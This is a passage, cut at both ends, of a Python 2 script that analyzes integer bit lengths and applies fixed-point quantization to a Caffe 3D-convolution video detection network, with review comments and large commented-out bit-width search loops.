            l.quantization_param.bw_multiply = bw_multiply
            l.quantization_param.fl_multiply = fl_multiply
    return net_proto
def change_layer_bottom_name(net_proto, layer_name,
                             layer_bottom_name):
    """Replace the bottom (input blob list) of the layer named 'layer_name';
    returns net_proto.

    NOTE(review): plain assignment assumes 'bottom' is an assignable attribute;
    a real protobuf repeated field would reject this -- confirm intended usage.
    """
    for candidate in net_proto.layer:
        if candidate.name == layer_name:
            candidate.bottom = layer_bottom_name
    return net_proto
def change_layer_top_name(net_proto, layer_name,
                          layer_top_name):
    """Replace the top (output blob list) of the layer named 'layer_name';
    returns net_proto.

    NOTE(review): plain assignment assumes 'top' is an assignable attribute;
    a real protobuf repeated field would reject this -- confirm intended usage.
    """
    for candidate in net_proto.layer:
        if candidate.name == layer_name:
            candidate.top = layer_top_name
    return net_proto
#calculate needed Integer Length of layer parameters
def calc_layer_param_IL(net, layer):
    """Return the number of integer bits (including sign) needed to represent
    the largest-magnitude weight -- and bias, when the layer has one -- of
    'layer', read from net.params[layer.name].

    'percentile' trims outliers: the candidate extremes are taken 'percentile'
    of the way in from each end of the sorted parameters. Fix: the original
    indexed the upper extreme as -1*int(n*percentile), which for
    percentile == 0 degenerates to index 0 (the minimum) and ignored the
    maximum entirely; the upper extreme is now indexed -(k+1).
    """
    percentile = 0.
    layer_param = net.params[layer.name]
    weight_sorted = np.sort(layer_param[0].data[...], axis=None)
    k = int(len(weight_sorted) * percentile)
    # Largest-magnitude weight among the trimmed lower/upper extremes.
    max_weight = max(weight_sorted[k], weight_sorted[-1 - k], key=abs)
    if layer.convolution_param.bias_term:
        bias_sorted = np.sort(layer_param[1].data[...], axis=None)
        kb = int(len(bias_sorted) * percentile)
        max_bias = max(bias_sorted[kb], bias_sorted[-1 - kb], key=abs)
    else:
        max_bias = 0
    max_param = max(max_weight, max_bias, key=abs)
    # Integer length = bits for the magnitude plus one sign bit.
    return math.ceil(math.log(abs(max_param), 2)) + 1
def analyze_net_param_IL(net, net_proto):
    """Compute the parameter integer length for every quantizable layer.

    Returns {layer_name: IL} covering ConvolutionIVS, FcIVS, NdConvolutionIVS
    and DeconvolutionRistretto layers of 'net_proto'.
    """
    quantized_types = ('ConvolutionIVS', 'FcIVS', 'NdConvolutionIVS',
                       'DeconvolutionRistretto')
    return dict((layer.name, calc_layer_param_IL(net, layer))
                for layer in net_proto.layer if layer.type in quantized_types)
#calculate needed Integer Length of layer output
def calc_layer_inout_IL(net, layer_bottom_name):
    """Integer bits (including sign) needed for the named blob's current
    activation values: ceil(log2(max |value|)) + 1."""
    blob_data = net.blobs[layer_bottom_name].data
    peak = abs(max(blob_data.max(), blob_data.min(), key=abs))
    return math.ceil(math.log(peak, 2)) + 1
def video_list_to_blob(videos):
    """Convert a list of equally-shaped videos into a single network input blob.

    Assumes videos are already prepared (means subtracted, BGR order, ...) and
    shaped (height, width, channels, length). Returns a float32 array with axis
    order (batch elem, channel, length, height, width).

    Fixed for portability: the original used the Python-2-only 'xrange';
    'enumerate' behaves identically under Python 2 and also runs on Python 3.
    """
    shape = videos[0].shape
    blob = np.zeros((len(videos), shape[0], shape[1], shape[2], shape[3]),
                    dtype=np.float32)
    for idx, video in enumerate(videos):
        blob[idx] = video
    # Move channels (axis 3) to axis 1
    # Axis order will become: (batch elem, channel, length, height, width)
    channel_swap = (0, 3, 4, 1, 2)
    return blob.transpose(channel_swap)
def _get_image_blob(im):
    """Converts a frame stack into a network input.

    Arguments:
        im (ndarray): a (height, width, channel, length) stack of BGR frames
    Returns:
        blob (ndarray): a data blob holding the mean-subtracted frames in
            (batch elem, channel, length, height, width) order
    """
    mean_subtracted = im.astype(np.float32, copy=True)
    # Subtract the per-channel BGR mean from every frame in the stack.
    for frame_idx in range(mean_subtracted.shape[-1]):
        mean_subtracted[:, :, :, frame_idx] -= [90, 98, 102]
    return video_list_to_blob([mean_subtracted])
def _get_blobs(im):
    """Convert a frame stack into network inputs: {'data': blob, 'rois': None}."""
    return {'data': _get_image_blob(im), 'rois': None}
def analyze_net_output_IL(net, net_proto):
    """Measure, per quantizable layer, the integer length (IL) needed for its
    input and output activations by streaming a video through the network.

    Opens the module-level 'video_name' capture source (NOTE(review):
    'video_name' is not defined anywhere visible in this file -- presumably a
    global set by the caller; cf. args.video -- confirm), keeps a rolling
    16-frame clip, forwards the net once per frame, and records the worst-case
    IL of every ConvolutionIVS/FcIVS/NdConvolutionIVS/DeconvolutionRistretto
    layer's top and bottom blobs. Returns (net_output_IL, net_input_IL) dicts
    keyed by layer name. Python 2 only (print statement, sys.maxint).
    """
    #num_images = len(imdb.image_index)
    #_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
    #if not cfg.TEST.HAS_RPN:
    #    roidb = imdb.roidb
    net_output_IL = dict()
    net_input_IL = dict()
    for layer in net_proto.layer:
        #if layer.top[0] == layer.bottom[0]:
        #    print layer.name, layer.type
        if layer.type == 'ConvolutionIVS' \
            or layer.type == 'FcIVS' \
            or layer.type == 'DeconvolutionRistretto' \
            or layer.type == 'NdConvolutionIVS' :
            # Measuring in/out separately requires distinct top/bottom blobs.
            assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
            # Seed with the most negative int so any measured IL replaces it.
            net_output_IL[layer.name] = -sys.maxint - 1
            net_input_IL[layer.name] = -sys.maxint - 1
    cap = cv2.VideoCapture(video_name)
    count = 0
    # Frames are first resized to width x height, then down to the CNN's
    # 112x112 input; 16 consecutive frames form one clip.
    width = 720
    height = 480
    CNNwidth = 112
    CNNheight = 112
    length = 16
    image_queue = np.zeros((CNNheight, CNNwidth,3,length), dtype=np.float32)
    while(cap.isOpened()):
        ret, frame = cap.read()
        if ret:
            frame = cv2.resize(frame, (width, height), interpolation = cv2.INTER_LINEAR)
            _frame = cv2.resize(frame, (CNNwidth, CNNheight), interpolation = cv2.INTER_LINEAR)
            if count == 0:
                # Prime the clip with 16 copies of the first frame.
                for i in range(length):
                    image_queue[:,:,:,i] = _frame
            else:
                # Slide the window: drop the oldest frame, append the newest.
                image_queue[:,:,:,:length-1] = image_queue[:,:,:,1:]
                image_queue[:,:,:,length-1] = _frame
            blobs = _get_blobs(image_queue)
            net.blobs['data'].reshape(*(blobs['data'].shape))
            net.blobs['data'].data[...] = blobs['data']
            blobs_out = net.forward()
            net.forward()
            # Track the worst-case IL seen so far for each layer's output/input.
            for layer in net_proto.layer:
                if layer.type == 'ConvolutionIVS' \
                    or layer.type == 'FcIVS' \
                    or layer.type == 'NdConvolutionIVS' \
                    or layer.type == 'DeconvolutionRistretto':
                    net_output_IL[layer.name] = max(calc_layer_inout_IL(net, layer.top[0]), net_output_IL[layer.name])
                    net_input_IL[layer.name] = max(calc_layer_inout_IL(net, layer.bottom[0]), net_input_IL[layer.name])
        else:
            break
        count += 1
        print count
    return net_output_IL, net_input_IL
#calculate needed Integer Length of layer adder
def calc_layer_adder_IL(net, layer_top_name):
    """Integer bits (including sign) needed for the adder statistics stashed in
    the first two elements of the named blob (bit-accurate analyze mode)."""
    data = net.blobs[layer_top_name].data
    flat = data.reshape(data.size)
    adder_peak = abs(max(flat[0], flat[1], key=abs))
    return math.ceil(math.log(adder_peak, 2)) + 1
#calculate needed Integer Length of layer multiplier
def calc_layer_multiplier_IL(net, layer_top_name):
    """Integer bits (including sign) needed for the multiplier statistics stashed
    in the third and fourth elements of the named blob (bit-accurate analyze
    mode)."""
    data = net.blobs[layer_top_name].data
    flat = data.reshape(data.size)
    multiplier_peak = abs(max(flat[2], flat[3], key=abs))
    return math.ceil(math.log(multiplier_peak, 2)) + 1
#analyze adder and multiplier of each layer in network
def analyze_net_adder_multiplier_IL(net, net_proto):
    """Measure the integer lengths needed by the internal adder and multiplier
    of every ConvolutionIVS/FcIVS layer running in bit-accurate analyze mode
    (the layers stash accumulator statistics in the first four elements of
    their top blob -- see calc_layer_adder_IL / calc_layer_multiplier_IL).

    Returns (net_adder_IL, net_multiplier_IL) dicts keyed by layer name.
    Python 2 only (xrange, sys.maxint).
    NOTE(review): 'num_iters' is not defined in this function or anywhere
    visible in this file -- presumably a module-level global set elsewhere;
    confirm before relying on this.
    """
    #num_images = len(imdb.image_index)
    #_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
    #if not cfg.TEST.HAS_RPN:
    #    roidb = imdb.roidb
    net_adder_IL = dict()
    net_multiplier_IL = dict()
    for layer in net_proto.layer:
        #if layer.top[0] == layer.bottom[0]:
        #    print layer.name, layer.type
        if layer.type == 'ConvolutionIVS' \
            or layer.type == 'FcIVS' :
            # Seed with the most negative int so any measured IL replaces it.
            net_adder_IL[layer.name] = -sys.maxint - 1
            # Analyze mode requires distinct top/bottom blob names.
            assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
            net_multiplier_IL[layer.name] = -sys.maxint - 1
    for i in xrange(num_iters):
        #if cfg.TEST.HAS_RPN:
        #    box_proposals = None
        #else:
        #    box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
        #im = cv2.imread(imdb.image_path_at(i))
        #scores, boxes = im_detect(net, im, _t, box_proposals)
        net.forward()
        # Overwrite one weight per quantized layer with the large constant
        # 2610214 before the second forward pass.
        # NOTE(review): presumably this forces a worst-case accumulator value
        # into the statistics; the choice of constant is undocumented -- confirm.
        for layer in net_proto.layer:
            if layer.type == 'ConvolutionIVS':
                net.params[layer.name][0].data[0][0][0][0]=2610214
            elif layer.type == 'FcIVS':
                net.params[layer.name][0].data[0][0]=2610214
        net.forward()
        # Track the worst-case adder/multiplier IL seen so far per layer.
        for layer in net_proto.layer:
            if layer.type == 'ConvolutionIVS' \
                or layer.type == 'FcIVS':
                net_adder_IL[layer.name] = max(calc_layer_adder_IL(net, layer.top[0]),
                                               net_adder_IL[layer.name])
                net_multiplier_IL[layer.name] = max(calc_layer_multiplier_IL(net, layer.top[0]),
                                                    net_multiplier_IL[layer.name])
    return net_adder_IL, net_multiplier_IL
#quantize adder in network
def quantize_net_adder(net_proto, net_adder_IL, adder_bw, extra_IL):
    """Apply 'adder_bw'-bit quantization to the adder of every ConvolutionIVS
    and FcIVS layer; all other quantization fields are carried over unchanged.
    The fractional length is adder_bw - (measured IL + extra_IL)."""
    for layer in net_proto.layer:
        if layer.type not in ('ConvolutionIVS', 'FcIVS'):
            continue
        adder_IL = net_adder_IL[layer.name] + extra_IL
        adder_FL = adder_bw - adder_IL
        qp = layer.quantization_param
        change_layer_bw(net_proto, layer.name,
                        qp.bw_layer_in, qp.fl_layer_in,
                        qp.bw_layer_out, qp.fl_layer_out,
                        qp.bw_params, qp.fl_params,
                        adder_bw, adder_FL,
                        qp.bw_multiply, qp.fl_multiply)
#quantize multiplier in network
def quantize_net_multiplier(net_proto, net_multiplier_IL, multiplier_bw, extra_IL):
    """Apply 'multiplier_bw'-bit quantization to the multiplier of every
    ConvolutionIVS and FcIVS layer; all other quantization fields are carried
    over unchanged. The fractional length is
    multiplier_bw - (measured IL + extra_IL)."""
    for layer in net_proto.layer:
        if layer.type not in ('ConvolutionIVS', 'FcIVS'):
            continue
        multiplier_IL = net_multiplier_IL[layer.name] + extra_IL
        multiplier_FL = multiplier_bw - multiplier_IL
        qp = layer.quantization_param
        change_layer_bw(net_proto, layer.name,
                        qp.bw_layer_in, qp.fl_layer_in,
                        qp.bw_layer_out, qp.fl_layer_out,
                        qp.bw_params, qp.fl_params,
                        qp.bw_add, qp.fl_add,
                        multiplier_bw, multiplier_FL)
#quantize input and output of each layer in network
def quantize_net_output(net_proto, net_output_IL, net_input_IL, output_bw, extra_IL):
    """Quantize the input and output activations of every quantizable layer to
    'output_bw' bits. Fractional lengths derive from the measured integer
    lengths plus 'extra_IL'; parameter/adder/multiplier fields are carried over
    unchanged."""
    input_bw = output_bw
    target_types = ('ConvolutionIVS', 'FcIVS', 'NdConvolutionIVS',
                    'DeconvolutionRistretto')
    for layer in net_proto.layer:
        if layer.type not in target_types:
            continue
        output_FL = output_bw - (net_output_IL[layer.name] + extra_IL)
        input_FL = input_bw - (net_input_IL[layer.name] + extra_IL)
        qp = layer.quantization_param
        change_layer_bw(net_proto, layer.name,
                        input_bw, input_FL,
                        output_bw, output_FL,
                        qp.bw_params, qp.fl_params,
                        qp.bw_add, qp.fl_add,
                        qp.bw_multiply, qp.fl_multiply)
#quantize convolution layers in network
def quantize_net_conv(net_proto, net_param_IL, weighting_bw, extra_IL):
    """Quantize the weights of every ConvolutionIVS layer to 'weighting_bw'
    bits; activation/adder/multiplier fields are carried over unchanged."""
    for layer in net_proto.layer:
        if layer.type != 'ConvolutionIVS':
            continue
        weighting_FL = weighting_bw - (net_param_IL[layer.name] + extra_IL)
        qp = layer.quantization_param
        change_layer_bw(net_proto, layer.name,
                        qp.bw_layer_in, qp.fl_layer_in,
                        qp.bw_layer_out, qp.fl_layer_out,
                        weighting_bw, weighting_FL,
                        qp.bw_add, qp.fl_add,
                        qp.bw_multiply, qp.fl_multiply)
#quantize fully connected layer in network
def quantize_net_fc(net_proto, net_param_IL, weighting_bw, extra_IL):
    """Quantize the weights of every FcIVS layer to 'weighting_bw' bits;
    activation/adder/multiplier fields are carried over unchanged."""
    for layer in net_proto.layer:
        if layer.type != 'FcIVS':
            continue
        weighting_FL = weighting_bw - (net_param_IL[layer.name] + extra_IL)
        qp = layer.quantization_param
        change_layer_bw(net_proto, layer.name,
                        qp.bw_layer_in, qp.fl_layer_in,
                        qp.bw_layer_out, qp.fl_layer_out,
                        weighting_bw, weighting_FL,
                        qp.bw_add, qp.fl_add,
                        qp.bw_multiply, qp.fl_multiply)
#quantize deconvolution layer in network
def quantize_net_deconv(net_proto, net_param_IL, weighting_bw, extra_IL):
    """Quantize the weights of every DeconvolutionRistretto layer to
    'weighting_bw' bits; other quantization fields are carried over unchanged."""
    for layer in net_proto.layer:
        if layer.type != 'DeconvolutionRistretto':
            continue
        weighting_FL = weighting_bw - (net_param_IL[layer.name] + extra_IL)
        qp = layer.quantization_param
        change_layer_bw(net_proto, layer.name,
                        qp.bw_layer_in, qp.fl_layer_in,
                        qp.bw_layer_out, qp.fl_layer_out,
                        weighting_bw, weighting_FL,
                        qp.bw_add, qp.fl_add,
                        qp.bw_multiply, qp.fl_multiply)
#quantize NdConvolution layer in network
def quantize_net_ndconv(net_proto, net_param_IL, weighting_bw, extra_IL):
    """Quantize the weights of every NdConvolutionIVS layer to 'weighting_bw'
    bits; other quantization fields are carried over unchanged."""
    for layer in net_proto.layer:
        if layer.type != 'NdConvolutionIVS':
            continue
        weighting_FL = weighting_bw - (net_param_IL[layer.name] + extra_IL)
        qp = layer.quantization_param
        change_layer_bw(net_proto, layer.name,
                        qp.bw_layer_in, qp.fl_layer_in,
                        qp.bw_layer_out, qp.fl_layer_out,
                        weighting_bw, weighting_FL,
                        qp.bw_add, qp.fl_add,
                        qp.bw_multiply, qp.fl_multiply)
#read network spec in prototxt
def read_from_prototxt(ori_net_path):
    """Parse the text-format prototxt at 'ori_net_path' into a caffe
    NetParameter message and return it."""
    net_proto = caffe_pb2.NetParameter()
    with open(ori_net_path) as proto_file:
        txtf.Merge(proto_file.read(), net_proto)
    return net_proto
#write network spec to prototxt
def write_to_prototxt(net_proto, out_net_path):
    """Serialize 'net_proto' (via str()) as text into the file at
    'out_net_path', overwriting any existing content."""
    with open(out_net_path, 'w') as out_file:
        out_file.write(str(net_proto))
#test network with no string printed
def test_qnet(net_path, caffemodel_path, imdb):
    """Load the net at 'net_path' with weights from 'caffemodel_path' and
    evaluate it silently on 'imdb', returning the average precision. Relies on
    the module-level 'args' for max_per_image/vis settings."""
    net = caffe.Net(net_path, caffemodel_path, caffe.TEST)
    model_file = os.path.basename(caffemodel_path)
    net.name = os.path.splitext(model_file)[0]
    return test_net_silent(net, imdb, max_per_image=args.max_per_image, vis=args.vis)
#print each layer name and spec
def print_net_layer_names(net):
    """Debug helper: dump the name, type and blob count of every (quantized)
    convolution layer of pycaffe net 'net', plus assorted attributes of the
    last matching layer. Python 2 only (bare print statements below).

    NOTE(review): the trailing 'print net.layer[1].name' is not a standard
    pycaffe attribute ('net.layers' is) -- confirm it works against the
    project's caffe fork. Indentation of the trailing prints is reconstructed;
    verify against the original source.
    """
    print("Network layers:")
    # Pair internal layer names with their Layer objects.
    for name, layer in zip(net._layer_names, net.layers):
        if layer.type == 'ConvolutionIVS' or layer.type == 'Convolution':
            print("{:<30}: {:22s}({} blobs)".format(name, layer.type, len(layer.blobs)))
            print dir(layer)
            print layer.reshape
            print layer.convolution_param
    print net.layer[1].name
def mAP_worker(i, net_path, shared_dict, GPU_ID):
    """Multiprocessing worker meant to evaluate the net at 'net_path' and store
    its mAP into shared_dict[i].

    Currently stubbed out: every evaluation path (pycaffe test_qnet and the
    external caffe test_detection binary) is commented out, so it always
    records 0.0. Python 2 only (bare print statement below).
    """
    #caffe.set_mode_cpu()
    #GPU_ID = 2 # Switch between 0 and 1 depending on the GPU you want to use.
    #cfg.GPU_ID = GPU_ID
    #caffe.set_device(GPU_ID)
    #caffe.set_mode_gpu()
    #imdb = get_imdb(args.imdb_name)
    #imdb.competition_mode(args.comp_mode)
    #if not cfg.TEST.HAS_RPN:
    #    imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
    #ap_string = check_output('./caffe-fast-rcnn-c3d/caffe-fast-rcnn-2/build/tools/caffe test_detection --model=' + net_path + ' --weights=' + args.caffemodel + ' -iterations=' + str(num_iters) + ' -gpu='+str(GPU_ID),shell=True)
    #ap_string = check_output('./caffe-fast-rcnn-c3d/caffe-fast-rcnn-2/build/tools/caffe test_detection --model=' + net_path + ' --weights=' + args.caffemodel + ' -iterations=' + str(30) + ' -gpu='+str(GPU_ID),shell=True)
    print 'NOT IMPLEMENT'
    ap = 0.
    #if len(ap_string) != 0:
    #    ap = float(ap_string)
    #ap = test_qnet(net_path, args.caffemodel, imdb)
    #ap = test_qnet(net_path, args.caffemodel, imdb)
    shared_dict[i] = ap
def analyze_net_output_IL_worker(net_output_IL, net_input_IL, GPU_ID):
    """Multiprocessing target: compute per-layer output/input integer
    lengths for the quantized net on GPU_ID and copy the results into the
    shared manager dicts net_output_IL / net_input_IL."""
    cfg.GPU_ID = GPU_ID
    caffe.set_device(GPU_ID)
    caffe.set_mode_gpu()
    proto = read_from_prototxt(args.prototxt_quantized)
    net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
    out_IL, in_IL = analyze_net_output_IL(net, proto)
    # copy into the shared proxies key by key (they are manager dicts)
    for key in out_IL.keys():
        net_output_IL[key] = out_IL[key]
    for key in in_IL.keys():
        net_input_IL[key] = in_IL[key]
def analyze_net_adder_multiplier_IL_worker(net_adder_IL, net_multiplier_IL, GPU_ID):
    """Multiprocessing target: compute per-layer adder/multiplier integer
    lengths for the bit-accurate net on GPU_ID and copy the results into
    the shared manager dicts net_adder_IL / net_multiplier_IL."""
    cfg.GPU_ID = GPU_ID
    caffe.set_device(GPU_ID)
    caffe.set_mode_gpu()
    proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
    net_BAC = caffe.Net(args.prototxt_quantized_BAC, args.caffemodel, caffe.TEST)
    adder_IL, multiplier_IL = analyze_net_adder_multiplier_IL(net_BAC, proto_BAC)
    # copy into the shared proxies key by key (they are manager dicts)
    for key in adder_IL.keys():
        net_adder_IL[key] = adder_IL[key]
    for key in multiplier_IL.keys():
        net_multiplier_IL[key] = multiplier_IL[key]
def analyze_net_param_IL_worker(net_param_IL, GPU_ID):
    """Multiprocessing target: compute per-layer weight integer lengths
    for the quantized net on GPU_ID and copy them into the shared manager
    dict net_param_IL."""
    cfg.GPU_ID = GPU_ID
    caffe.set_device(GPU_ID)
    caffe.set_mode_gpu()
    proto = read_from_prototxt(args.prototxt_quantized)
    net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
    param_IL = analyze_net_param_IL(net, proto)
    for key in param_IL.keys():
        net_param_IL[key] = param_IL[key]
# Driver script: progressively quantize a detection network (weights,
# activations, then bit-accurate adders/multipliers), searching for the
# smallest bit widths that keep accuracy within a margin. Python 2 only
# (print statements). Large portions of the search are commented out and
# replaced by fixed initial bit widths.
if __name__ == '__main__':
    args = parse_args()
    num_iters = 4952
    video_name = args.video
    print('Called with args:')
    print(args)
    if args.cfg_file is not None:
        cfg_from_file(args.cfg_file)
    if args.set_cfgs is not None:
        cfg_from_list(args.set_cfgs)
    cfg.GPU_ID = args.gpu_id
    print('Using config:')
    pprint.pprint(cfg)
    # rewrite the original prototxt with quantization-aware layer types
    convert_net_to_qnet(args.prototxt, args.prototxt_quantized)
    print 'Create quantized prototxt'
    print 'Testing Full Precision Accuracy'
    manager = multiprocessing.Manager()
    shared_dict = manager.dict()
    # both workers pinned to the same GPU
    GPU1 = 3
    GPU2 = 3
    #p = multiprocessing.Process(target=mAP_worker, args=('FP-FP-FP-FP-FP', args.prototxt, shared_dict, GPU1))
    timer = Timer()
    #timer.tic()
    #p.start()
    #p.join()
    #timer.toc()
    #print ('Took {:.3f}s').format(timer.total_time)
    #full_ap = shared_dict['FP-FP-FP-FP-FP']
    #full_ap = 0.572219
    #print 'Full precision accuracy : {}'.format(full_ap)
    # Bit Width for Analyze
    bw_range_conv = [8, 4] #bit width for convolution layers
    bw_range_deconv = [32, 16, 8, 4, 2] #bit width for deconvolution layers
    bw_range_fc = [32, 16, 8, 7, 6, 5, 4, 2] #bit width for fully connected layers
    bw_range_output = [32, 16, 8, 4, 2] #bit width for layer input and output
    bw_conv = 6 #just initial
    bw_deconv = 6 #just initial
    bw_fc = 6 #just initial
    bw_ndconv = 6 #just initial
    bw_output = 6 #just initial
    bw_adder = 32 #just initial
    bw_multiplier = 32 #just initial
    # integer-length reductions applied on top of the analyzed ILs
    convIL_reduction =0
    deconvIL_reduction = 0
    fcIL_reduction = 0
    ndconvIL_reduction = 0
    actIL_reduction = 0
    adderIL_reduction = 0
    multIL_reduction = 0
    print 'Analyzing network'
    net_proto = read_from_prototxt(args.prototxt)
    has_conv, has_deconv, has_fc, has_ndconv = analyze_network(net_proto)
    print 'Network Structure'
    print 'CONV:{}, DECONV:{}, FC:{} NDCONV:{}'.format(has_conv, has_deconv, has_fc, has_ndconv)
    print '-----------------------------------'
    net_proto = read_from_prototxt(args.prototxt_quantized)
    # analyze per-layer weight integer lengths in a child process (frees
    # GPU memory when the process exits), then persist to JSON
    print 'Analyzing network parameter IL'
    net_param_IL = manager.dict()
    p = multiprocessing.Process(target=analyze_net_param_IL_worker,
                                args=(net_param_IL, GPU1, ))
    p.start()
    p.join()
    with open('param_analysis.json', 'w') as outfile:
        param_analysis = dict()
        param_analysis['net_param_IL'] = dict()
        for t in net_param_IL.keys():
            param_analysis['net_param_IL'][t] = net_param_IL[t]
        json.dump(param_analysis, outfile)
    #sys.exit(0)
    # Analyze Convolution and DeConvolution Layers
    #if has_conv:
    #    print 'Analyzing CONV and DECONV'
    #    print '\tbit width\t accuracy'
    #    i = 5
    #    not_found = True
    #    while not_found:
    #        timer = Timer()
    #        timer.tic()
    #        jobs = []
    #        net_proto = read_from_prototxt(args.prototxt_quantized)
    #        quantize_net_conv(net_proto, net_param_IL, i, convIL_reduction)
    #        quantize_net_deconv(net_proto, net_param_IL, i, deconvIL_reduction)
    #        write_to_prototxt(net_proto, './temp'+str(i)+'.prototxt')
    #        p1 = multiprocessing.Process(target=mAP_worker, args=(str(i)+'-32-32-32-32',
    #                                     './temp'+str(i)+'.prototxt',
    #                                     shared_dict,GPU1))
    #        jobs.append(p1)
    #        p1.start()
    #        net_proto = read_from_prototxt(args.prototxt_quantized)
    #        quantize_net_conv(net_proto, net_param_IL, i+1, convIL_reduction)
    #        quantize_net_deconv(net_proto, net_param_IL, i+1, deconvIL_reduction)
    #        write_to_prototxt(net_proto, './temp'+str(i+1)+'.prototxt')
    #        p2 = multiprocessing.Process(target=mAP_worker, args=(str(i+1)+'-32-32-32-32',
    #                                     './temp'+str(i+1)+'.prototxt',
    #                                     shared_dict,GPU2))
    #        jobs.append(p2)
    #        p2.start()
    #        for proc in jobs:
    #            proc.join()
    #        timer.toc()
    #        for j in range(i, i+2):
    #            print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict[str(j)+'-32-32-32-32'],timer.total_time)
    #        for j in range(i, i+2):
    #            if shared_dict[str(j)+'-32-32-32-32'] > (full_ap - args.error_margin):
    #                bw_conv = j
    #                not_found = False
    #                break;
    #        i = i + 2
    # Analyze Convolution and DeConvolution Layers
    #if has_conv:
    #    print 'Analyzing CONV and DECONV'
    #    print '\tbit width\t accuracy'
    #    bw_h = 16
    #    bw_l = 0
    #    bw = 16
    #    while True:
    #        net_proto = read_from_prototxt(args.prototxt_quantized)
    #        quantize_net_conv(net, net_proto, net_param_IL, bw)
    #        quantize_net_deconv(net, net_proto, net_param_IL, bw)
    #        write_to_prototxt(net_proto, './temp.prototxt')
    #        ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
    #        print '\t{}bit:\t\t{}'.format(bw,ap)
    #        if ap < (full_ap - args.error_margin):
    #            bw_l = bw
    #        else:
    #            bw_h = bw
    #            bw_conv = bw
    #        if bw_h - bw_l <= 1:
    #            break
    #        bw = bw_l + (bw_h-bw_l)/2
    # Analyze Fully Connected Layers
    #if has_fc:
    #    print 'Analyzing FC'
    #    print '\tbit width\t accuracy'
    #    i = 3
    #    not_found = True
    #    while not_found:
    #        timer = Timer()
    #        timer.tic()
    #        jobs = []
    #        net_proto = read_from_prototxt(args.prototxt_quantized)
    #        quantize_net_fc(net_proto, net_param_IL, i, fcIL_reduction)
    #        write_to_prototxt(net_proto, './temp'+str(i)+'.prototxt')
    #        p1 = multiprocessing.Process(target=mAP_worker, args=('32-'+str(i)+'-32-32-32',
    #                                     './temp'+str(i)+'.prototxt',
    #                                     shared_dict,GPU1))
    #        jobs.append(p1)
    #        p1.start()
    #        net_proto = read_from_prototxt(args.prototxt_quantized)
    #        quantize_net_fc(net_proto, net_param_IL, i+1, fcIL_reduction)
    #        write_to_prototxt(net_proto, './temp'+str(i+1)+'.prototxt')
    #        p2 = multiprocessing.Process(target=mAP_worker, args=('32-'+str(i+1)+'-32-32-32',
    #                                     './temp'+str(i+1)+'.prototxt',
    #                                     shared_dict,GPU2))
    #        jobs.append(p2)
    #        p2.start()
    #        for proc in jobs:
    #            proc.join()
    #        timer.toc()
    #        for j in range(i, i+2):
    #            print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-'+str(j)+'-32-32-32'],timer.total_time)
    #        for j in range(i, i+2):
    #            if shared_dict['32-'+str(j)+'-32-32-32'] > (full_ap - args.error_margin):
    #                bw_fc = j
    #                not_found = False
    #                break;
    #        i = i + 2
    # Analyze Fully Connected Layers
    #if has_fc:
    #    print 'Analyzing FC'
    #    print '\tbit width\t accuracy'
    #    bw_h = 16
    #    bw_l = 0
    #    bw = 16
    #    while True:
    #        net_proto = read_from_prototxt(args.prototxt_quantized)
    #        quantize_net_fc(net, net_proto, net_param_IL, bw)
    #        write_to_prototxt(net_proto, './temp.prototxt')
    #        ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
    #        print '\t{}bit:\t\t{}'.format(bw,ap)
    #        if ap < (full_ap - args.error_margin):
    #            bw_l = bw
    #        else:
    #            bw_h = bw
    #            bw_fc = bw
    #        if bw_h - bw_l <=1:
    #            break
    #        bw = bw_l + (bw_h-bw_l)/2
    # Analyze input and output of layers
    #net_proto = read_from_prototxt(args.prototxt_quantized)
    #quantize_net_conv(net, net_proto, net_param_IL, bw_conv, -1)
    #quantize_net_deconv(net, net_proto, net_param_IL, bw_conv, -1)
    #quantize_net_fc(net, net_proto, net_param_IL, bw_fc, -1)
    #write_to_prototxt(net_proto, args.prototxt_quantized)
    # activation (layer input/output) integer lengths: either analyze in a
    # child process or load a previously saved act_analysis.json
    net_output_IL = manager.dict()
    net_input_IL = manager.dict()
    if args.act_analysis == None:
        print 'Analyzing network output IL'
        p = multiprocessing.Process(target=analyze_net_output_IL_worker,
                                    args=(net_output_IL, net_input_IL, GPU1))
        p.start()
        p.join()
        with open('act_analysis.json', 'w') as outfile:
            act_analysis = dict()
            act_analysis['net_output_IL'] = dict()
            act_analysis['net_input_IL'] = dict()
            for t in net_output_IL.keys():
                act_analysis['net_output_IL'][t] = net_output_IL[t]
            for t in net_input_IL.keys():
                act_analysis['net_input_IL'][t] = net_input_IL[t]
            json.dump(act_analysis, outfile)
    else:
        print 'Loading network output IL'
        with open(args.act_analysis) as json_data:
            act_analysis = json.load(json_data)
            for t in act_analysis['net_output_IL'].keys():
                net_output_IL[t] = act_analysis['net_output_IL'][t]
            for t in act_analysis['net_input_IL'].keys():
                net_input_IL[t] = act_analysis['net_input_IL'][t]
    #print 'Analyzing layer output'
    #print '\tbit width\t accuracy'
    #i = 3
    #not_found = True
    #while not_found:
    #    timer = Timer()
    #    timer.tic()
    #    jobs = []
    #    net_proto = read_from_prototxt(args.prototxt_quantized)
    #    quantize_net_output(net_proto, net_output_IL, net_input_IL, i, actIL_reduction)
    #    write_to_prototxt(net_proto, './temp'+str(i)+'.prototxt')
    #    p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-'+str(i)+'-32-32',
    #                                 './temp'+str(i)+'.prototxt',
    #                                 shared_dict,GPU1))
    #    jobs.append(p1)
    #    p1.start()
    #    net_proto = read_from_prototxt(args.prototxt_quantized)
    #    quantize_net_output(net_proto, net_output_IL, net_input_IL, i+1, actIL_reduction)
